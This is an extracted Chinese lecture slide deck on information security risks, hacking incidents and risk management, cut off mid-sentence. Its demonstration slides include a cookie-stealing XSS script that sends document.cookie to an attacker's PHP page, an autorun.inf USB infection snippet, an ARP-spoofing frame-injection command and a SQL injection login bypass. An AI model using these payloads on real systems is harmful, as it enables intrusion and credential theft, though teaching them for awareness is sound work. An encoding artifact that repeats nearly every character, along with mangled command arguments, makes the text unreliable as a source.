信息安全風(fēng)險(xiǎn)及分析

1、信息安全風(fēng)險(xiǎn)及分析第1頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一個(gè)人介紹 高顯嵩工作經(jīng)歷：中國(guó)“互聯(lián)網(wǎng)信息安全與政府監(jiān)管”專家組成員中國(guó)法證技術(shù)研究組成員北京司法局電子數(shù)據(jù)鑒定協(xié)會(huì)理事北京廣播電視大學(xué)特聘專家原微軟公司的技術(shù)支持工程師項(xiàng)目背景勞動(dòng)部全國(guó)民辦中介機(jī)構(gòu)信用等級(jí)評(píng)定系統(tǒng)勞動(dòng)部全國(guó)知識(shí)競(jìng)賽評(píng)分系統(tǒng)勞動(dòng)部七個(gè)功能平臺(tái)合并方案北京統(tǒng)計(jì)局的報(bào)表打印系統(tǒng)北京電大一站式平臺(tái)合并的規(guī)劃及實(shí)施為考研在線提供整體安全解決方安及實(shí)施為國(guó)家電力部?jī)?nèi)部網(wǎng)絡(luò)設(shè)計(jì)安全解決方安及實(shí)施鞍山移動(dòng)公司網(wǎng)絡(luò)規(guī)劃長(zhǎng)期負(fù)責(zé)北京市安全局國(guó)家安全部?jī)?nèi)部技術(shù)培訓(xùn)負(fù)責(zé)華彬大廈的整個(gè)網(wǎng)絡(luò)規(guī)劃及實(shí)施美國(guó)百麥公司北京分公司

2、的整個(gè)網(wǎng)絡(luò)規(guī)劃及實(shí)施第2頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一主要內(nèi)容信息安全的重要性信息安全問題分析信息安全管理概述信息安全風(fēng)險(xiǎn)管理信息安全人員管理第3頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一信息安全重要性第4頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一當(dāng)前我國(guó)網(wǎng)絡(luò)信息安全的狀況網(wǎng)絡(luò)及計(jì)算機(jī)病毒傳播泛濫垃圾郵件和病毒郵件泛濫 黑客攻擊事件頻繁用戶的個(gè)人隱私及計(jì)算機(jī)的使用權(quán)受到侵犯網(wǎng)絡(luò)犯罪事件頻繁監(jiān)管力度不夠涉及版權(quán)問題的事件增多沒有統(tǒng)一完善的適合國(guó)情的安全標(biāo)準(zhǔn)及法規(guī)沒有職責(zé)分明的管理部門或管理小組制約與網(wǎng)絡(luò)基礎(chǔ)設(shè)施和技術(shù)環(huán)境安全體系不健全全

3、民安全意識(shí)及計(jì)算機(jī)網(wǎng)絡(luò)知識(shí)薄弱第5頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一CERT有關(guān)信息安全的統(tǒng)計(jì) 第6頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 CERT有關(guān)信息安全的統(tǒng)計(jì) 第7頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一CERT有關(guān)信息安全的統(tǒng)計(jì) 第8頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一網(wǎng)絡(luò)病毒傳播泛濫據(jù)2001年調(diào)查，我國(guó)約73%的計(jì)算機(jī)用戶曾感染病毒，2003年上半年升至83%。其中，感染3次以上的用戶高達(dá)59%，而且病毒的破壞性較大，被病毒破壞全部數(shù)據(jù)的占14%，破壞部分?jǐn)?shù)據(jù)的占57%。對(duì)病毒的預(yù)防和發(fā)現(xiàn)速度相對(duì)

4、緩慢 垃圾郵件及病毒郵件泛濫第9頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一黑客離我們很近1996年信息安全數(shù)據(jù)顯示，世界上平均每秒就有一起黑客事件發(fā)生，無論是政府機(jī)構(gòu)、軍事部門，還是各大銀行、大公司，只要與互聯(lián)網(wǎng)接軌，就難逃黑客的“黑手”。據(jù)美國(guó)網(wǎng)絡(luò)安全公司Sophos發(fā)布的報(bào)告顯示，在2008年第一季度，平均每5秒鐘就會(huì)有一個(gè)網(wǎng)頁成為黑客們的“盤中餐”。中國(guó)網(wǎng)民每年被網(wǎng)絡(luò)黑客“黑”掉76億元。第10頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一FBI計(jì)算機(jī)犯罪調(diào)查報(bào)告2002年503家機(jī)構(gòu)中，有60%受到了攻擊2002年其中223家（占503家的44%）損失的總和

5、達(dá)到$4.55848億2003年530家機(jī)構(gòu)中有75%（398家）在年內(nèi)受到了攻擊2003年251家（占530家的47%）的經(jīng)濟(jì)損失總和為$2.01799734 億第11頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一全球信息安全損失數(shù)額： 年份損失額199936億美元200042億美元2001129億美元 2002超過200億美元2003超過280億美元第12頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一中國(guó)已成為全球黑客的第三大來源地 有關(guān)統(tǒng)計(jì)數(shù)據(jù)顯示，目前我國(guó)95%的與因特網(wǎng)相聯(lián)的網(wǎng)絡(luò)管理中心都遭到過國(guó)境內(nèi)外黑客的攻擊或侵入，受害涉及的覆蓋面越來越大、程度越來越深。

6、據(jù)國(guó)際互聯(lián)網(wǎng)保安公司Symantec年的報(bào)告指出，中國(guó)甚至已經(jīng)成為全球黑客的第三大來源地，竟然有6.9%的攻擊國(guó)際互聯(lián)網(wǎng)活動(dòng)都是由中國(guó)發(fā)出的。然而面對(duì)這種局面，我國(guó)卻缺乏像西方發(fā)達(dá)國(guó)家那樣健全的防范措施。第13頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一第14頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一第15頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一第16頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一2003年黑客事件中韓新人王網(wǎng)上對(duì)抗 遭黑客入侵推遲10多分鐘中韓圍棋新人王對(duì)抗賽在中國(guó)的新浪網(wǎng)和韓國(guó)網(wǎng)站落子，孔杰七段執(zhí)白中盤戰(zhàn)勝韓國(guó)的宋

7、泰坤四段。賽前，由于有人以孔杰的名字入侵比賽的服務(wù)器，導(dǎo)致比賽推遲了多分鐘才正常進(jìn)行。 第17頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一2003年黑客事件百度連續(xù)遭遇嚴(yán)重黑客攻擊 5月15日至5月18日，中文搜索網(wǎng)站百度遭到中國(guó)互聯(lián)網(wǎng)有史以來罕見黑客攻擊。據(jù)百度負(fù)責(zé)技術(shù)的副總裁劉建國(guó)介紹，自5月15日22:00起，百度的檢索量突然大增，此番增長(zhǎng)并未引起工程師注意。5月16日，攻擊更加強(qiáng)烈，每秒鐘攻擊次數(shù)搞到達(dá)1000次，同一個(gè)詞被查詢次數(shù)最多達(dá)38863次。據(jù)互聯(lián)網(wǎng)技術(shù)專家介紹，每秒鐘攻擊100次就已經(jīng)屬于非常嚴(yán)重的攻擊，而每秒鐘1000次的攻擊就實(shí)屬罕見第18頁，共88頁，2

8、022年，5月20日，16點(diǎn)35分，星期一2003年黑客事件263游戲論壇遭黑客攻擊關(guān)閉第19頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一2004年黑客事件騰訊服務(wù)器被攻擊10月17日早上10時(shí)許，國(guó)內(nèi)各地網(wǎng)民陸續(xù)騰訊QQ無法登陸。據(jù)騰訊QQ內(nèi)部技術(shù)人員透露，一國(guó)內(nèi)團(tuán)體，利用騰訊QQ服務(wù)器漏洞要挾騰訊支付100萬美金作為“修復(fù)”費(fèi)用，騰訊QQ不予理睬后，該組織于17日正式發(fā)動(dòng)攻擊，騰訊QQ服務(wù)器在1個(gè)小時(shí)內(nèi)大面積出現(xiàn)故障,不得不全面終止進(jìn)行搶修.本次行動(dòng)組織嚴(yán)謹(jǐn)、操作迅速，業(yè)內(nèi)有部分安全管理人士稱網(wǎng)絡(luò)進(jìn)入軟件綁架勒索時(shí)代。第20頁，共88頁，2022年，5月20日，16點(diǎn)35分，

9、星期一2004年黑客事件江民網(wǎng)站被攻擊2004年10月17日國(guó)內(nèi)著名的殺毒軟件廠商江民公司的網(wǎng)站被一名為河馬史詩的黑客攻破，頁面內(nèi)容被篡改。攻擊緣由：江民公司的最新殺毒軟件產(chǎn)品KV2005的升級(jí)導(dǎo)致用戶在上網(wǎng)時(shí)無法打開“郵件監(jiān)控和網(wǎng)頁監(jiān)控”，用戶在江民公司的官方論壇發(fā)反映后，江民沒有做出及時(shí)的回復(fù)，也沒能在短時(shí)間內(nèi)解決用戶的問題。第21頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一2005年黑客事件頻繁 也許你的計(jì)算機(jī)正在被當(dāng)作從事違法犯罪活動(dòng)的工具，而當(dāng)這些悄悄發(fā)生的時(shí)候，你卻一無所知，因?yàn)槟愕碾娔X已經(jīng)成為被別人控制的“僵尸電腦”。第22頁，共88頁，2022年，5月20日，16

10、點(diǎn)35分，星期一2005年黑客事件國(guó)內(nèi)首起僵尸網(wǎng)絡(luò)事件 今年27歲的徐立系唐山市某企業(yè)工人，其利用某些手段在互聯(lián)網(wǎng)上傳播其編寫的特定程序，先后植入4萬余臺(tái)計(jì)算機(jī)，形成了中國(guó)首例BOTNET“僵尸網(wǎng)絡(luò)。 2004年10月至2005年1月，徐立操縱“僵尸網(wǎng)絡(luò)”對(duì)北京大呂黃鐘電子商務(wù)有限公司所屬音樂網(wǎng)站北京飛行網(wǎng)（簡(jiǎn)稱酷樂），發(fā)動(dòng)多次攻擊，致使該公司蒙受重大經(jīng)濟(jì)損失，并導(dǎo)致北京電信數(shù)據(jù)中心某機(jī)房網(wǎng)絡(luò)設(shè)備大面積癱瘓。第23頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一2006年黑客事件2006年12月31日 中國(guó)工商銀行被黑06年的最后一天，很多網(wǎng)友都收到一些號(hào)稱“工行要倒閉，所有存款均沒

11、收”之類的新聞鏈接，地址都是正牌的，而不是盜版的。原來工商被黑客入侵，截止當(dāng)天晚上11點(diǎn)，發(fā)現(xiàn)此漏洞已經(jīng)修改好。 第24頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一07年第一黑客事件深圳律師網(wǎng)被黑當(dāng)進(jìn)入該網(wǎng)站之后，就發(fā)生事故了，發(fā)現(xiàn)，已經(jīng)被黑.主要有以下字樣：天空未留痕跡,鳥兒卻已飛過.網(wǎng)絡(luò)亦是虛擬,瘋狂亦是叛逆.尊敬的網(wǎng)站管理員 您好.臺(tái)灣是中國(guó)的，日本是吃S的. .如果你是中國(guó)人.請(qǐng)保留此頁幾天 謝謝!. 少年浪子 所向披靡 OICQ 11888956第25頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：得到本地登錄密碼Pulist.exe+findpass.

12、exePasswordReminder.exe第26頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：記錄本地登錄密碼GINA PassWord Sniffer第27頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子得到遠(yuǎn)程計(jì)算機(jī)的密碼IpcScan2.0第28頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：更改本地管理員密碼WindowsNT/2000/XP/2003/Linux/Unix系統(tǒng)，本地接觸可以更改任意用戶的密碼。一張軟盤更改本地管理員密碼Ntpassword一張光盤更改本地管理員密碼ERD Commander 2003第29頁，共88頁

13、，2022年，5月20日，16點(diǎn)35分，星期一例子：ERD COMMANDER第30頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子： ERD COMMANDER第31頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：得到他人的郵件密碼密碼監(jiān)聽器2.8第32頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一第33頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一第34頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一第35頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：內(nèi)網(wǎng)滲透 ZXARPS.EXE內(nèi)網(wǎng)主機(jī)訪問任意站點(diǎn)被入侵指

14、定的IP段中的用戶訪問的所有網(wǎng)站都插入一個(gè)框架代碼 zxarps.exe -idx 0 -ip -9 -port 80 -insert 第36頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一ARP協(xié)議工作原理第37頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一ARP欺騙交換機(jī)第38頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一ARP欺騙計(jì)算機(jī)第39頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：內(nèi)網(wǎng)U盤感染U盤在互聯(lián)網(wǎng)和局域網(wǎng)內(nèi)交叉使用文件被盜取Autorun.infautorun風(fēng)暴autorunopen=shellopen=打開(&O)sh

15、ellopenCommand=WScript.exe .autorun.vbsshellopenDefault=1shellexplore=資源管理器(&X)shellexploreCommand=WScript.exe .autorun.vbs第40頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：查看網(wǎng)絡(luò)內(nèi)任何人的上網(wǎng)記錄可以記錄同一局域網(wǎng)內(nèi)任何計(jì)算機(jī)上瀏覽的網(wǎng)頁內(nèi)容，察看的郵箱內(nèi)容，登陸的ftp的內(nèi)容。用Outlook或者Outlook Express接受的全部郵件都回同時(shí)被該軟件接收。第41頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一第42頁，共88頁，20

16、22年，5月20日，16點(diǎn)35分，星期一例子：查看MSN密碼第43頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：察看星號(hào)密碼第44頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：讀取緩存密碼第45頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一例子：控制他人計(jì)算機(jī)Dameware 4.5Remote Administrator2.1是一種網(wǎng)絡(luò)管理軟件，但是經(jīng)常被黑客利用來遠(yuǎn)程控制和管理，被入侵者的計(jì)算機(jī)。第46頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一第47頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一第48頁，共88頁，

17、2022年，5月20日，16點(diǎn)35分，星期一例子：打開對(duì)方攝像頭和語音第49頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一SQL INJECTION 針對(duì)網(wǎng)站的攻擊第50頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一SQL INJECTION 針對(duì)網(wǎng)站的攻擊第51頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一SQL INJECTION 針對(duì)網(wǎng)站的攻擊第52頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一SQL INJECTION 針對(duì)網(wǎng)站的攻擊第53頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一SQL INJECTION 針對(duì)網(wǎng)站的攻擊

18、第54頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一SQL INJECTION 針對(duì)網(wǎng)站的攻擊第55頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一SQL INJECTION 針對(duì)網(wǎng)站的攻擊第56頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一SQL INJECTION 針對(duì)網(wǎng)站的攻擊第57頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一SQL INJECTION 針對(duì)網(wǎng)站的攻擊第58頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一XSS 跨站腳本構(gòu)建了個(gè) Javascript 腳本傳遞客戶端的 cookie 到黑客的服務(wù)器Javascrip

19、t 腳本可以簡(jiǎn)單的這樣寫 var img = new Image(); img.src = get_cookie.php?var= + encodeURI(document.cookie); 然后服務(wù)器端使用 PHP 簡(jiǎn)單寫了個(gè)腳本保存 Cookie 數(shù)據(jù) 第59頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一構(gòu)造SQL登陸語句用戶名: admin密碼: 1 or 1=1第60頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一其他例子擊鍵記錄Office文檔掛栽木馬網(wǎng)頁木馬木馬捆綁第61頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一信息安全管理概述第62頁，共88

20、頁，2022年，5月20日，16點(diǎn)35分，星期一 例一：局域網(wǎng)內(nèi)病毒泛濫成災(zāi)。 例二：網(wǎng)絡(luò)中為什么會(huì)有ARP欺騙的問題發(fā)生 例三：局域網(wǎng)內(nèi)計(jì)算機(jī)故障頻繁發(fā)生 例四：為什么要給每個(gè)用戶管理員權(quán)限先來分析兩個(gè)例子第63頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 信息安全的成敗取決于兩個(gè)因素：技術(shù)和管理。 技術(shù)是信息安全的構(gòu)筑材料，管理是真正的粘合劑和催化劑。 人們常說，三分技術(shù)，七分管理，可見管理對(duì)信息安全的重要性。 信息安全管理（Information Security Management）作為組織完整的管理體系中一個(gè)重要的環(huán)節(jié)，它構(gòu)成了信息安全具有能動(dòng)性的部分，是指導(dǎo)和控制組

21、織的關(guān)于信息安全風(fēng)險(xiǎn)的相互協(xié)調(diào)的活動(dòng)，其針對(duì)對(duì)象就是組織的信息資產(chǎn)。 現(xiàn)實(shí)世界里大多數(shù)安全事件的發(fā)生和安全隱患的存在，與其說是技術(shù)上的原因，不如說是管理不善造成的，理解并重視管理對(duì)于信息安全的關(guān)鍵作用，對(duì)于真正實(shí)現(xiàn)信息安全目標(biāo)來說尤其重要。 什么是信息安全管理？第64頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 根據(jù)風(fēng)險(xiǎn)評(píng)估結(jié)果、法律法規(guī)要求、組織業(yè)務(wù)運(yùn)作自身需要來確定控制目標(biāo)與控制措施。 實(shí)施所選的安全控制措施。 針對(duì)檢查結(jié)果采取應(yīng)對(duì)措施，改進(jìn)安全狀況。 依據(jù)策略、程序、標(biāo)準(zhǔn)和法律法規(guī)，對(duì)安全措施的實(shí)施情況進(jìn)行符合性檢查。信息安全管理模型第65頁，共88頁，2022年，5月20

22、日，16點(diǎn)35分，星期一 信息安全必須從整體考慮，必須做到“有計(jì)劃有目標(biāo)、發(fā)現(xiàn)問題、分析問題、采取措施解決問題、后續(xù)監(jiān)督避免再現(xiàn)”這樣全程管理的思路，這就要求建立的是一套完整的信息安全管理體系，這樣的系統(tǒng)工程，只有處于組織最高管理者領(lǐng)導(dǎo)和支持之下，才可能成功 最高管理層通過明確信息安全目標(biāo)和方針為信息安全活動(dòng)指引方向 最高管理層能夠?yàn)樾畔踩顒?dòng)提供必要的資源支持 最高管理層能夠在重大問題上做出決策 最高管理層可以協(xié)調(diào)組織不同單位不同環(huán)節(jié)的關(guān)系，提升促動(dòng)力 說到底，最高管理者是組織信息安全的最終責(zé)任人組織高管全面負(fù)責(zé)信息安全管理第66頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一

23、制定有效的安全管理計(jì)劃，可以確保信息安全策略得到恰當(dāng)執(zhí)行 進(jìn)行有效安全管理的途徑，應(yīng)該是自上而下的（Top-Down）： 最高管理層負(fù)責(zé)啟動(dòng)并定義組織的安全方針 管理中層負(fù)責(zé)將安全策略充實(shí)成標(biāo)準(zhǔn)、基線、指南和程序，并監(jiān)督執(zhí)行 業(yè)務(wù)經(jīng)理或安全專家負(fù)責(zé)實(shí)施安全管理文件中的指定配置 最終用戶負(fù)責(zé)遵守組織所有的安全策略 安全管理計(jì)劃小組應(yīng)該開發(fā)三類計(jì)劃： 戰(zhàn)略計(jì)劃（strategic plan）是長(zhǎng)期計(jì)劃（例如5年），相對(duì)穩(wěn)定，定義了組織的目標(biāo)和使命 戰(zhàn)術(shù)計(jì)劃（tactical plan）是中期計(jì)劃（例如1年），是對(duì)實(shí)現(xiàn)戰(zhàn)略計(jì)劃中既定目標(biāo)的任務(wù)和進(jìn)度的細(xì)節(jié)描述，例如雇用計(jì)劃、預(yù)算計(jì)劃、維護(hù)計(jì)劃、系統(tǒng)開

24、發(fā)計(jì)劃等 操作計(jì)劃（operational plan）是短期的高度細(xì)化的計(jì)劃，須經(jīng)常更新（每月或每季度），例如培訓(xùn)計(jì)劃、系統(tǒng)部署計(jì)劃、產(chǎn)品設(shè)計(jì)計(jì)劃等按計(jì)劃行事第67頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 數(shù)據(jù)收集者（Data Collector）對(duì)數(shù)據(jù)主體（Data Subject）：準(zhǔn)確（Accuracy）、隱私（Privacy）； 數(shù)據(jù)保管者（Data Custodian）對(duì)數(shù)據(jù)擁有者（Data Owner）：可用性（Availability）、完整性（Integrity）、保密性（Confidentiality）； 數(shù)據(jù)用戶（Data Users）對(duì)擁有者/主體（Ow

25、ner/Subject）：保密性（Confidentiality）和完整性； 系統(tǒng)用戶（System Users）對(duì)系統(tǒng)擁有者（System Owner）：可用性（Availability）和軟件完整性（Software Integrity）； 系統(tǒng)管理者（System Manager）對(duì)用戶（Users），可用性（Integrity）、完整性（Integrity）； 用戶（Users）對(duì)其它用戶（Other Users）：可用性（Availability）。重要角色和職責(zé)第68頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一信息安全管風(fēng)險(xiǎn)管理第69頁，共88頁，2022年，5月20

26、日，16點(diǎn)35分，星期一風(fēng)險(xiǎn) 風(fēng)險(xiǎn)管理（Risk Management）就是識(shí)別風(fēng)險(xiǎn)、評(píng)估風(fēng)險(xiǎn)、采取措施將風(fēng)險(xiǎn)減少到可接受水平，并維持這個(gè)風(fēng)險(xiǎn)水平的過程。風(fēng)險(xiǎn)管理是信息安全管理的核心內(nèi)容。 在信息安全領(lǐng)域，風(fēng)險(xiǎn)（Risk）就是指信息資產(chǎn)遭受損壞并給企業(yè)帶來負(fù)面影響的潛在可能性。風(fēng)險(xiǎn)管理風(fēng)險(xiǎn)管理概述第70頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 資產(chǎn)（Asset） 對(duì)組織具有價(jià)值的信息資產(chǎn)，包括計(jì)算機(jī)硬件、通信設(shè)施、數(shù)據(jù)庫、文檔信息、軟件、信息服務(wù)和人員等，所有這些資產(chǎn)都需要妥善保護(hù)。 威脅（Threat） 可能對(duì)資產(chǎn)或組織造成損害的某種安全事件發(fā)生的潛在原因，需要識(shí)別出威脅源

27、（Threat source）或威脅代理（Threat agent）。 弱點(diǎn)（Vulnerability） 也被稱作漏洞或脆弱性，即資產(chǎn)或資產(chǎn)組中存在的可被威脅利用的缺點(diǎn)，弱點(diǎn)一旦被利用，就可能對(duì)資產(chǎn)造成損害。 風(fēng)險(xiǎn)（Risk） 特定威脅利用資產(chǎn)弱點(diǎn)給資產(chǎn)或資產(chǎn)組帶來損害的潛在可能性。 可能性（Likelihood） 對(duì)威脅發(fā)生幾率（Probability）或頻率（Frequency）的定性描述。 影響（Impact） 后果（Consequence），意外事件發(fā)生給組織帶來的直接或間接的損失或傷害。 安全措施（Safeguard） 控制（control）或?qū)Σ撸╟ountermeasure），

28、即通過防范威脅、減少弱點(diǎn)、限制意外事件帶來影響等途徑來消減風(fēng)險(xiǎn)的機(jī)制、方法和措施。 殘留風(fēng)險(xiǎn)（Residual Risk） 在實(shí)施安全措施之后仍然存在的風(fēng)險(xiǎn)。風(fēng)險(xiǎn)管理相關(guān)要素第71頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一風(fēng)險(xiǎn)RISKRISKRISKRISK風(fēng)險(xiǎn)基本的風(fēng)險(xiǎn)采取措施后剩余的風(fēng)險(xiǎn)資產(chǎn)威脅弱點(diǎn)資產(chǎn)威脅弱點(diǎn)風(fēng)險(xiǎn)管理的目標(biāo)第72頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一安全控制的成本安全事件造成的損失最小化的總成本低高高安全成本/損失所提供的安全水平關(guān)鍵是達(dá)成成本利益的平衡第73頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一識(shí)別并評(píng)價(jià)資產(chǎn)識(shí)別并

29、評(píng)估威脅識(shí)別并評(píng)估弱點(diǎn)現(xiàn)有控制確認(rèn)風(fēng)險(xiǎn)評(píng)價(jià)接受保持現(xiàn)有控制確定風(fēng)險(xiǎn)消減策略選擇控制目標(biāo)和控制方式實(shí)施選定的控制YesNo確認(rèn)并評(píng)估殘留風(fēng)險(xiǎn)定期評(píng)估風(fēng)險(xiǎn)評(píng)估風(fēng)險(xiǎn)消減風(fēng)險(xiǎn)接受及控制風(fēng)險(xiǎn)管理風(fēng)險(xiǎn)管理的一般過程第74頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 風(fēng)險(xiǎn)評(píng)估（Risk Assessment）是對(duì)信息資產(chǎn)及其價(jià)值、面臨的威脅、存在的弱點(diǎn)，以及三者綜合作用而帶來風(fēng)險(xiǎn)的大小或水平的評(píng)估。 作為風(fēng)險(xiǎn)管理的基礎(chǔ)，風(fēng)險(xiǎn)評(píng)估是組織確定信息安全需求的一個(gè)重要途徑，屬于組織信息安全管理體系策劃的過程。主要任務(wù)包括： 識(shí)別構(gòu)成風(fēng)險(xiǎn)的各種因素 評(píng)估風(fēng)險(xiǎn)發(fā)生的可能性和造成的影響，并最終評(píng)價(jià)風(fēng)險(xiǎn)水平或

30、大小 確定組織承受風(fēng)險(xiǎn)的能力 確定風(fēng)險(xiǎn)消減和控制的策略、目標(biāo)和優(yōu)先順序 推薦風(fēng)險(xiǎn)消減對(duì)策以供實(shí)施 包括風(fēng)險(xiǎn)分析（Risk Analysis）和風(fēng)險(xiǎn)評(píng)價(jià)（Risk Evaluation）兩部分，但一般來說，風(fēng)險(xiǎn)評(píng)估和風(fēng)險(xiǎn)分析同義。什么是風(fēng)險(xiǎn)評(píng)估？第75頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 降低風(fēng)險(xiǎn)（Reduce Risk） 實(shí)施有效控制，將風(fēng)險(xiǎn)降低到可接受的程度，實(shí)際上就是力圖減小威脅發(fā)生的可能性和帶來的影響，包括： 減少威脅：例如，實(shí)施惡意軟件控制程序，減少信息系統(tǒng)受惡意軟件攻擊的機(jī)會(huì) 減少弱點(diǎn)：例如，通過安全意識(shí)培訓(xùn)，強(qiáng)化職員的安全意識(shí)與安全操作能力 降低影響：例如，制

31、定災(zāi)難恢復(fù)計(jì)劃和業(yè)務(wù)連續(xù)性計(jì)劃，做好備份 規(guī)避風(fēng)險(xiǎn)（Avoid Risk） 或者Rejecting Risk。有時(shí)候，組織可以選擇放棄某些可能引來風(fēng)險(xiǎn)的業(yè)務(wù)或資產(chǎn)，以此規(guī)避風(fēng)險(xiǎn)。例如，將重要的計(jì)算機(jī)系統(tǒng)與互聯(lián)網(wǎng)隔離，使其免遭來自外部網(wǎng)絡(luò)的攻擊。 轉(zhuǎn)嫁風(fēng)險(xiǎn)（Transfer Risk） 也稱作Risk Assignment。將風(fēng)險(xiǎn)全部或者部分地轉(zhuǎn)移到其他責(zé)任方，例如購(gòu)買商業(yè)保險(xiǎn)。 接受風(fēng)險(xiǎn)（Accept Risk） 在實(shí)施了其他風(fēng)險(xiǎn)應(yīng)對(duì)措施之后，對(duì)于殘留的風(fēng)險(xiǎn)，組織可以選擇接受。確定風(fēng)險(xiǎn)消減策略第76頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 絕對(duì)安全（即零風(fēng)險(xiǎn)）是不可能的。 實(shí)

32、施安全控制后會(huì)有殘留風(fēng)險(xiǎn)或殘存風(fēng)險(xiǎn)（Residual Risk）。 為了實(shí)現(xiàn)信息安全，應(yīng)該確保殘留風(fēng)險(xiǎn)在可接受的范圍內(nèi)： 殘留風(fēng)險(xiǎn)Rr 原有風(fēng)險(xiǎn)R0 控制效力R 殘留風(fēng)險(xiǎn)Rr 可接受的風(fēng)險(xiǎn)Rt 對(duì)殘留風(fēng)險(xiǎn)進(jìn)行確認(rèn)和評(píng)價(jià)的過程其實(shí)就是風(fēng)險(xiǎn)接受的過程。決策者可以根據(jù)風(fēng)險(xiǎn)評(píng)估的結(jié)果來確定一個(gè)閥值，以該閥值作為是否接受殘留風(fēng)險(xiǎn)的標(biāo)準(zhǔn)。 評(píng)價(jià)殘留風(fēng)險(xiǎn)第77頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一信息安全人員管理第78頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 人是信息安全的關(guān)鍵因素，人員管理不善會(huì)給組織帶來非常大的安全威脅和風(fēng)險(xiǎn)。 有調(diào)查顯示，大多數(shù)重大信息安全事件通常

33、都來自組織內(nèi)部，例如，員工受利益驅(qū)使將公司技術(shù)圖紙出賣給競(jìng)爭(zhēng)對(duì)手，利用內(nèi)部系統(tǒng)從事經(jīng)濟(jì)犯罪活動(dòng)，或者由于缺乏安全意識(shí)或操作技能而導(dǎo)致誤操作，引起信息系統(tǒng)故障等。 為降低內(nèi)部員工所帶來的人為差錯(cuò)、盜竊、欺詐及濫用設(shè)施的風(fēng)險(xiǎn)，并且避免引發(fā)法律風(fēng)險(xiǎn)，組織應(yīng)該采取措施，加強(qiáng)內(nèi)部人員的安全管理： 對(duì)工作申請(qǐng)者實(shí)施背景檢查 簽署雇用合同和保密協(xié)議 加強(qiáng)在職人員的安全管理 嚴(yán)格控制人員離職程序必須高度重視人員安全問題第79頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 背景檢查是工作申請(qǐng)過程的一個(gè)部分，組織至少會(huì)審查申請(qǐng)人簡(jiǎn)歷中的基本信息。對(duì)于敏感職位，可能還會(huì)考慮進(jìn)一步的調(diào)查。調(diào)查過程中，組織

